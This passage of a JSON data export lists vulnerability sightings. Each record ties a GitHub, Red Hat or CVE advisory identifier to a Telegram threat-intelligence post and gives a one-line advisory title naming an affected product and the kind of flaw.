"creation_timestamp": "2024-03-03T09:16:25.000000Z"}, {"uuid": "5802a910-2cda-4472-a526-11ffe2b1f0c4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4W9V-7H8H-RV8X", "type": "seen", "source": "https://t.me/ctinow/198464", "content": "https://ift.tt/MRWHSNE\nCVE-2024-25677 | Min 1.29.0 XML Document unknown vulnerability (GHSA-4w9v-7h8h-rv8x)", "creation_timestamp": "2024-03-02T20:16:54.000000Z"}, {"uuid": "da1c684d-8c0e-4d84-a201-958015ba2cc8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-C2X9-VW5H-39VC", "type": "seen", "source": "https://t.me/ctinow/208253", "content": "https://ift.tt/pa2eMFx\n[GHSA-c2x9-vw5h-39vc] Apache Pulsar: Pulsar Functions Worker Allows Unauthorized File Access and Unauthorized HTTP/HTTPS Proxying", "creation_timestamp": "2024-03-14T22:56:56.000000Z"}, {"uuid": "9bdb5d45-4fc5-4ecb-ba6e-96484bd0a5c1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-JG2G-4RJG-CMQH", "type": "seen", "source": "https://t.me/ctinow/208247", "content": "https://ift.tt/pGm7Isy\n[GHSA-jg2g-4rjg-cmqh] Apache Pulsar: Pulsar Functions Worker's Archive Extraction Vulnerability Allows Unauthorized File Modification", "creation_timestamp": "2024-03-14T22:47:05.000000Z"}, {"uuid": "2eeb036f-7bdb-4d02-9822-49ceb7741796", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-PHG6-44M7-HX3H", "type": "seen", "source": "https://t.me/ctinow/208193", "content": "https://ift.tt/w1HR9rD\n[GHSA-phg6-44m7-hx3h] Whoogle Search Cross-site Scripting vulnerability", "creation_timestamp": "2024-03-14T21:46:43.000000Z"}, {"uuid": "1ab3227f-3c9d-4841-a4e7-6c57261ecbf4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-Q97G-C29H-X2P7", "type": "seen", "source": "https://t.me/ctinow/208192", "content": "https://ift.tt/mScI3n0\n[GHSA-q97g-c29h-x2p7] Whoogle Search Path Traversal vulnerability", "creation_timestamp": "2024-03-14T21:46:42.000000Z"}, {"uuid": "49a9f364-8a47-425b-bb8b-2bb38e7ea563", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-XH6M-7CR7-XX66", "type": "seen", "source": "https://t.me/ctinow/208282", "content": "https://ift.tt/ZFgi84z\nCVE-2023-45859 | Hazelcast on Hazelcast Client Protocol permissions (GHSA-xh6m-7cr7-xx66)", "creation_timestamp": "2024-03-14T23:31:30.000000Z"}, {"uuid": "9c52e8ca-6f13-42a8-ba15-66599ad895d1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:1063", "type": "seen", "source": "https://t.me/ctinow/198965", "content": "https://ift.tt/ErLjVB4\nRHSA-2024:1063: Important: edk2 security update", "creation_timestamp": "2024-03-04T03:16:31.000000Z"}, {"uuid": "d7c5a4eb-b9c8-42d1-bc08-7cdb1cddb6ef", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:1196", "type": "seen", "source": "https://t.me/ctinow/201672", "content": "https://ift.tt/9zNHrBl\nRHSA-2024:1196: Moderate: Red Hat JBoss Enterprise Application Platform 7.4 security update", "creation_timestamp": "2024-03-06T19:17:18.000000Z"}, {"uuid": "7ac7684f-dcfd-4423-a368-6fa8ca2b6ed8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:1197", "type": "seen", "source": "https://t.me/ctinow/201671", "content": "https://ift.tt/HzKp1ZP\nRHSA-2024:1197: Low: Red Hat JBoss Enterprise Application Platform 7.4 security update", "creation_timestamp": "2024-03-06T19:17:16.000000Z"}, {"uuid": "4715115e-a188-4ee8-b82a-432a48bacb7a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5FRW-4RWQ-XHCR", "type": "seen", "source": "https://t.me/ctinow/201598", "content": "https://ift.tt/YxjO8lV\n[GHSA-5frw-4rwq-xhcr] Deno's improper suffix match testing for DENO_AUTH_TOKENS", "creation_timestamp": "2024-03-06T18:16:35.000000Z"}, {"uuid": "b3a8ec5b-67bd-4205-80ef-9f14857b2909", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-H6J3-J35F-V2X7", "type": "seen", "source": "https://t.me/ctinow/201596", "content": "https://ift.tt/QBqW4VK\n[GHSA-h6j3-j35f-v2x7] PocketMine-MP server crash with certain invalid JSON payloads in `LoginPacket` due to dependency vulnerability (3rd time)", "creation_timestamp": "2024-03-06T18:16:33.000000Z"}, {"uuid": "e2f63833-e522-49d4-beeb-31abf191ed14", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-XC7J-WJ36-QJFR", "type": "seen", "source": "https://t.me/ctinow/201595", "content": "https://ift.tt/NftRITK\n[GHSA-xc7j-wj36-qjfr] PocketMine-MP BookEditPacket crash when inventory slot in the packet is invalid", "creation_timestamp": "2024-03-06T18:16:31.000000Z"}, {"uuid": "9e22dcdf-873d-4ce8-8372-b03970071fc8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-R3W7-MFPM-C2VW", "type": "seen", "source": "https://t.me/ctinow/201592", "content": "https://ift.tt/iKPlvbr\n[GHSA-r3w7-mfpm-c2vw] Incorrect TLS certificate auth method in Vault", "creation_timestamp": "2024-03-06T18:07:45.000000Z"}, {"uuid": "7eeebc61-045c-4d81-804f-d94879beec9d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-F6G2-H7QV-3M5V", "type": "seen", "source": "https://t.me/ctinow/201577", "content": "https://ift.tt/5uyMjPo\n[GHSA-f6g2-h7qv-3m5v] Remote Code Execution by uploading a phar file using frontmatter", "creation_timestamp": "2024-03-06T18:01:53.000000Z"}, {"uuid": "a6386518-b791-4c90-a379-7b1db9041f35", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-64R3-X3GF-VP63", "type": "seen", "source": "https://t.me/ctinow/197975", "content": "https://ift.tt/oQYf7EX\nCVE-2024-24771 | open-formulieren open-forms up to 2.2.8/2.3.6/2.4.4/2.5.1 /admin/login/ improper authentication (GHSA-64r3-x3gf-vp63)", "creation_timestamp": "2024-03-01T20:46:42.000000Z"}, {"uuid": "53b28c7e-86a7-4313-8920-1cd626a13378", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-3HRR-XWVG-HXVR", "type": "seen", "source": "https://t.me/ctinow/197022", "content": "https://ift.tt/rYkMKVi\n[GHSA-3hrr-xwvg-hxvr] Keycloak DoS via account lockout", "creation_timestamp": "2024-02-29T21:26:58.000000Z"}, {"uuid": "cbcecb80-2dc3-41e3-ae6c-7fcb77096452", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9XXV-Q6PP-96WQ", "type": "seen", "source": "https://t.me/ctinow/197018", "content": "https://ift.tt/Zfx2W0G\n[GHSA-9xxv-q6pp-96wq] Concrete CMS Stored XSS", "creation_timestamp": "2024-02-29T21:26:54.000000Z"}, {"uuid": "4cb94807-4deb-4c94-ad30-e788532f6f1e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6QVW-249J-H44C", "type": "seen", "source": "https://t.me/ctinow/197019", "content": "https://ift.tt/w1bsqRg\n[GHSA-6qvw-249j-h44c] jose4j denial of service via specifically crafted JWE", "creation_timestamp": "2024-02-29T21:26:55.000000Z"}, {"uuid": "5a181bc1-42f9-4f3b-ba2b-0f49e9a1abe0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:1057", "type": "seen", "source": "https://t.me/ctinow/197014", "content": "https://ift.tt/3U5bpMo\nRHSA-2024:1057: Important: Red Hat Ansible Automation Platform 2.4 Product Security and Bug Fix Update", "creation_timestamp": "2024-02-29T21:16:24.000000Z"}, {"uuid": "bc6e170c-02e8-42f8-b0ca-f536aa7573b1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-HP2X-6VRM-7J7V", "type": "seen", "source": "https://t.me/ctinow/198060", "content": "https://ift.tt/BPGkIWy\n[GHSA-hp2x-6vrm-7j7v] Apache Archiva Reflected Cross-site Scripting vulnerability", "creation_timestamp": "2024-03-01T22:51:37.000000Z"}, {"uuid": "2efd6764-6691-402d-90e3-c4dfa22400d6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9Q6V-RXMW-G3GH", "type": "seen", "source": "https://t.me/ctinow/198059", "content": "https://ift.tt/LQK7P9p\n[GHSA-9q6v-rxmw-g3gh] Apache Ambari: Various Cross site scripting problems", "creation_timestamp": "2024-03-01T22:51:36.000000Z"}, {"uuid": "6f772982-82ad-4646-b184-2fc90fc74f93", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6XWF-XVF3-V459", "type": "seen", "source": "https://t.me/ctinow/198058", "content": "https://ift.tt/bt4Q2xP\n[GHSA-6xwf-xvf3-v459] Apache Airflow: Incorrect Default Permissions in audit logs for Ops and Viewers users", "creation_timestamp": "2024-03-01T22:51:34.000000Z"}, {"uuid": "d8f09c09-faab-4ed9-893e-ee0c063881ab", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2449-JMFC-GC7F", "type": "seen", "source": "https://t.me/ctinow/197990", "content": "https://ift.tt/NXzqLk4\nCVE-2024-24706 | Forum One WP-CFM Plugin up to 1.7.8 on WordPress cross-site request forgery (GHSA-2449-jmfc-gc7f)", "creation_timestamp": "2024-03-01T21:16:41.000000Z"}, {"uuid": "220ef369-4d34-4577-bfe4-59f5fd4fd72f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-3XF8-G8GR-G7RH", "type": "seen", "source": "https://t.me/ctinow/198140", "content": "https://ift.tt/eobtqcf\nCVE-2024-24823 | Graylog2 Server up to 5.1.10/5.2.3 /api/system/sessions session fixiation (GHSA-3xf8-g8gr-g7rh)", "creation_timestamp": "2024-03-01T23:56:44.000000Z"}, {"uuid": "6f77b784-af1a-4a7c-9010-6b82237fe32d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-H595-VWHC-3XWX", "type": "seen", "source": "https://t.me/ctinow/197996", "content": "https://ift.tt/afnG6zO\n[GHSA-h595-vwhc-3xwx] Apache Archiva Incorrect Authorization vulnerability", "creation_timestamp": "2024-03-01T21:21:47.000000Z"}, {"uuid": "22b3140d-b9bd-4514-b238-dda757c6aa5a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-RV4H-M4WC-V99W", "type": "seen", "source": "https://t.me/ctinow/197995", "content": "https://ift.tt/jcAko96\n[GHSA-rv4h-m4wc-v99w] Apache Archiva Incorrect Authorization vulnerability", "creation_timestamp": "2024-03-01T21:21:46.000000Z"}, {"uuid": "7867bad1-326f-4f6e-982d-cbea1fb40be0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5MHG-WV8W-P59J", "type": "seen", "source": "https://t.me/ctinow/197994", "content": "https://ift.tt/81OM9Ab\n[GHSA-5mhg-wv8w-p59j] Directus version number disclosure", "creation_timestamp": "2024-03-01T21:21:44.000000Z"}, {"uuid": "eedcbe31-c679-4b36-bebf-289106fccb69", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-QW9G-7549-7WG5", "type": "seen", "source": "https://t.me/ctinow/197852", "content": "https://ift.tt/wIsW5zk\n[GHSA-qw9g-7549-7wg5] Directus has MySQL accent insensitive email matching", "creation_timestamp": "2024-03-01T18:07:07.000000Z"}, {"uuid": "4960d571-0a41-45e7-9217-0cfdf47d7469", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-FFFG-CWC9-XVJ7", "type": "seen", "source": "https://t.me/ctinow/197851", "content": "https://ift.tt/3NduJXr\n[GHSA-fffg-cwc9-xvj7] mongo-express Cross-site Request Forgery vulnerability", "creation_timestamp": "2024-03-01T18:07:06.000000Z"}, {"uuid": "1d01874d-546f-4a54-bed7-5bc394caf6cf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-68C2-4MPX-QH95", "type": "seen", "source": "https://t.me/ctinow/197850", "content": "https://ift.tt/laJp9gA\n[GHSA-68c2-4mpx-qh95] Potential leakage of Sentry auth tokens by React Native SDK with Expo plugin", "creation_timestamp": "2024-03-01T18:07:05.000000Z"}, {"uuid": "4639743d-19fa-4761-8df0-e384839cb982", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6JVG-HP25-42F6", "type": "seen", "source": "https://t.me/ctinow/197849", "content": "https://ift.tt/QVXszud\n[GHSA-6jvg-hp25-42f6] Nteract Remote Code Execution vulnerability", "creation_timestamp": "2024-03-01T18:07:04.000000Z"}, {"uuid": "d3bf76c2-dd09-4f22-9ad1-40e8f15ab1ae", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-M3V5-2J5Q-X85W", "type": "seen", "source": "https://t.me/ctinow/197488", "content": "https://ift.tt/H0UJSKR\nCVE-2024-23344 | Enalean Tuleap Community Edition prior 15.4.99.140 information disclosure (GHSA-m3v5-2j5q-x85w)", "creation_timestamp": "2024-03-01T10:46:18.000000Z"}, {"uuid": "ef2e4718-2a15-49f2-9657-be37a2146a29", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:1062", "type": "seen", "source": "https://t.me/ctinow/197408", "content": "https://ift.tt/BYuqK9I\nRHSA-2024:1062: Important: squid:4 security update", "creation_timestamp": "2024-03-01T09:16:33.000000Z"}, {"uuid": "e93b5076-bc71-47a5-bc5d-9a3d8b802183", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-W5MX-334J-6FWV", "type": "seen", "source": "https://t.me/ctinow/197993", "content": "https://ift.tt/op9bSnE\n[GHSA-w5mx-334j-6fwv] Bagist Cross-site Scripting vulnerability", "creation_timestamp": "2024-03-01T21:16:44.000000Z"}, {"uuid": "33371679-a80a-4ea3-9d3e-92396840af09", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-Q76R-7P4Q-MQPW", "type": "seen", "source": "https://t.me/ctinow/197169", "content": "https://ift.tt/qARjUtF\n[GHSA-q76r-7p4q-mqpw] Cockpit CMS Cross-Site Scripting vulnerability", "creation_timestamp": "2024-03-01T00:37:00.000000Z"}, {"uuid": "0b12e12d-1ca9-4d33-a11c-9688f47201c6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6V6W-H8M6-7MV2", "type": "seen", "source": "https://t.me/ctinow/197168", "content": "https://ift.tt/v3rPq7T\n[GHSA-6v6w-h8m6-7mv2] Apache Airflow: DAG Code and Import Error Permissions Ignored", "creation_timestamp": "2024-03-01T00:36:59.000000Z"}, {"uuid": "e4c03186-0807-4163-ab7f-a954118a7fca", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7V3V-984V-H74R", "type": "seen", "source": "https://t.me/ctinow/197132", "content": "https://ift.tt/P19Bm5C\n[GHSA-7v3v-984v-h74r] Mattermost leaks details of\u00a0AD/LDAP groups of a teams", "creation_timestamp": "2024-02-29T23:56:27.000000Z"}, {"uuid": "8bb8f906-5e34-4460-a888-f6862e9ac3c9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2019:4360", "type": "seen", "source": "https://t.me/ctinow/202741", "content": "https://ift.tt/Bqe0Yn4\nCVE-2019-19334 | libyang up to 1.0-r4 YANG Parser stack-based overflow (RHSA-2019:4360)", "creation_timestamp": "2024-03-07T20:11:42.000000Z"}, {"uuid": "9ebe4a88-db49-4f99-b9cd-87735206a5a3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2019:4360", "type": "seen", "source": "https://t.me/ctinow/202740", "content": "https://ift.tt/Ii97YQ2\nCVE-2019-19333 | libyang up to 1.0-r4 YANG Parser stack-based overflow (RHSA-2019:4360)", "creation_timestamp": "2024-03-07T20:11:41.000000Z"}, {"uuid": "f69079d3-d5b8-4c7f-aefb-f05084e9648b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2PC2-H97H-2MMW", "type": "seen", "source": "https://t.me/ctinow/201830", "content": "https://ift.tt/j9ScDlN\n[GHSA-2pc2-h97h-2mmw] Jenkins iceScrum Plugin vulnerable to stored Cross-site Scripting", "creation_timestamp": "2024-03-06T21:26:16.000000Z"}, {"uuid": "c32cfd0c-131c-4e94-ad30-b5bd64563698", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-64C5-R2H5-C2FG", "type": "seen", "source": "https://t.me/ctinow/201829", "content": "https://ift.tt/bxP3CZU\n[GHSA-64c5-r2h5-c2fg] Jenkins docker-build-step Plugin Cross-Site Request Forgery vulnerability", "creation_timestamp": "2024-03-06T21:26:15.000000Z"}, {"uuid": "f133bbef-2a48-469c-9409-cd733a8a6ead", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7WH2-WXC7-9PH5", "type": "seen", "source": "https://t.me/ctinow/197693", "content": "https://ift.tt/gw7b9nz\nCVE-2024-24810 | WiX Toolset up to 4.0.3 on Windows Installer untrusted search path (GHSA-7wh2-wxc7-9ph5)", "creation_timestamp": "2024-03-01T15:16:52.000000Z"}, {"uuid": "e2cb3c32-6f24-4d99-9786-40f67b66dea5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2019:4054", "type": "seen", "source": "https://t.me/ctinow/202499", "content": "https://ift.tt/Eqzb6CK\nCVE-2019-11255 | Kubernetes CSI Sidecar Container Persistent input validation (RHSA-2019:4054)", "creation_timestamp": "2024-03-07T15:41:40.000000Z"}, {"uuid": "d8590548-d4c4-43c1-92dc-de68682736c0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0966", "type": "seen", "source": "https://t.me/ctinow/195720", "content": "https://ift.tt/jnQ8MsX\nRHSA-2024:0966: Moderate: opensc security update", "creation_timestamp": "2024-02-28T18:22:21.000000Z"}, {"uuid": "1b5587d2-3948-4190-9dae-47c6c2b28405", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0967", "type": "seen", "source": "https://t.me/ctinow/195719", "content": "https://ift.tt/MBIgY1R\nRHSA-2024:0967: Moderate: opensc security update", "creation_timestamp": "2024-02-28T18:22:20.000000Z"}, {"uuid": "045f083b-c671-44f0-979d-eaa053bd01f2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0968", "type": "seen", "source": "https://t.me/ctinow/195718", "content": "https://ift.tt/tXKNOsp\nRHSA-2024:0968: Important: firefox security update", "creation_timestamp": "2024-02-28T18:22:19.000000Z"}, {"uuid": "8e3c1987-9e81-4b9c-914a-14c9d25e923e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0970", "type": "seen", "source": "https://t.me/ctinow/195716", "content": "https://ift.tt/zdMXJt9\nRHSA-2024:0970: Important: firefox security update", "creation_timestamp": "2024-02-28T18:22:18.000000Z"}, {"uuid": "589dfa41-773c-485c-99d0-1f6035f6656c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-QRP9-23P7-G5MF", "type": "seen", "source": "https://t.me/ctinow/194921", "content": "https://ift.tt/ZX4G0W1\n[GHSA-qrp9-23p7-g5mf] Apache Ambari XML External Entity injection", "creation_timestamp": "2024-02-27T23:07:05.000000Z"}, {"uuid": "1d5fa490-2df2-4f3a-8ed5-452e9105939b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7P7Q-FJFW-V3GF", "type": "seen", "source": "https://t.me/ctinow/194918", "content": "https://ift.tt/v5OJTQz\n[GHSA-7p7q-fjfw-v3gf] Bagisto Cross-Site Request Forgery vulnerability", "creation_timestamp": "2024-02-27T23:07:01.000000Z"}, {"uuid": "3d075ce7-2d37-45a8-9591-92971c33776a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-GP6M-FQ6H-CJCX", "type": "seen", "source": "https://t.me/ctinow/194917", "content": "https://ift.tt/UTKmON0\n[GHSA-gp6m-fq6h-cjcx] Magento LTS vulnerable to stored XSS in admin file form", "creation_timestamp": "2024-02-27T23:02:15.000000Z"}, {"uuid": "44732134-52aa-41d6-bf95-277b17d0f653", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-WF4X-8MPJ-R42Q", "type": "seen", "source": "https://t.me/ctinow/194380", "content": "https://ift.tt/3pobQ81\nCVE-2019-16765 | vscode-codeql 1.0.1 codeQL.cli.executablePath path traversal (GHSA-wf4x-8mpj-r42q)", "creation_timestamp": "2024-02-27T13:46:51.000000Z"}, {"uuid": "9b3205ae-4859-43c2-8f1e-61b38018ac49", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:1018", "type": "seen", "source": "https://t.me/ctinow/195467", "content": "https://ift.tt/iChebRO\nRHSA-2024:1018: Important: kernel security update", "creation_timestamp": "2024-02-28T14:18:38.000000Z"}, {"uuid": "6bcd9c81-3927-40a8-bb10-5c882fb31304", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-XH6M-7CR7-XX66", "type": "seen", "source": "https://t.me/ctinow/194920", "content": "https://ift.tt/QLVMf39\n[GHSA-xh6m-7cr7-xx66] Missing permission checks on Hazelcast client protocol", "creation_timestamp": "2024-02-27T23:07:04.000000Z"}, {"uuid": "ec163886-8eb0-43db-86fe-5b65483b05db", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-86H5-XCPX-CFQC", "type": "seen", "source": "https://t.me/ctinow/194919", "content": "https://ift.tt/zBVDiq9\n[GHSA-86h5-xcpx-cfqc] ASA-2024-005: Potential slashing evasion during re-delegation", "creation_timestamp": "2024-02-27T23:07:02.000000Z"}, {"uuid": "706b0945-7100-4813-b471-3e57fe222377", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-X5R5-2QRX-RQJ8", "type": "seen", "source": "https://t.me/ctinow/194826", "content": "https://ift.tt/XHd9r57\n[GHSA-x5r5-2qrx-rqj8] Transparent TLS may not be applied to Marbles with certain manifest configurations", "creation_timestamp": "2024-02-27T20:22:17.000000Z"}, {"uuid": "79dfb055-f13d-4538-b9f0-2bd2f457c08b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9P8R-4XP4-GW5W", "type": "seen", "source": "https://t.me/ctinow/193775", "content": "https://ift.tt/QamoqwK\n[GHSA-9p8r-4xp4-gw5w] Vyper's `_abi_decode` vulnerable to Memory Overflow", "creation_timestamp": "2024-02-26T21:26:27.000000Z"}, {"uuid": "512115d3-59d8-4e60-a157-7a2b2d7fe2e7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-JW7R-RXFF-GV24", "type": "seen", "source": "https://t.me/ctinow/194922", "content": "https://ift.tt/PgOJ3N0\n[GHSA-jw7r-rxff-gv24] Apache James MIME4J improper input validation vulnerability", "creation_timestamp": "2024-02-27T23:07:06.000000Z"}, {"uuid": "bf2bc22f-a495-44e2-84ef-5ffbda93da4e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-Q4QH-8PXW-R48Q", "type": "seen", "source": "https://t.me/ctinow/194914", "content": "https://ift.tt/0TWvuch\n[GHSA-q4qh-8pxw-r48q] Subrion CMS vulnerable to Cross Site Scripting", "creation_timestamp": "2024-02-27T22:56:38.000000Z"}, {"uuid": "ea93b913-5b21-440c-bde6-0a9b71907896", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-XXF8-FPMR-FW7V", "type": "seen", "source": "https://t.me/ctinow/194913", "content": "https://ift.tt/mDf2k7t\n[GHSA-xxf8-fpmr-fw7v] Subrion CMS vulnerable to SQL Injection", "creation_timestamp": "2024-02-27T22:56:37.000000Z"}, {"uuid": "09250791-5fd9-4c54-8d65-767349aaefb2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-JJHX-JHVP-74WQ", "type": "seen", "source": "https://t.me/ctinow/194911", "content": "https://ift.tt/6GoICWq\n[GHSA-jjhx-jhvp-74wq] Rails has 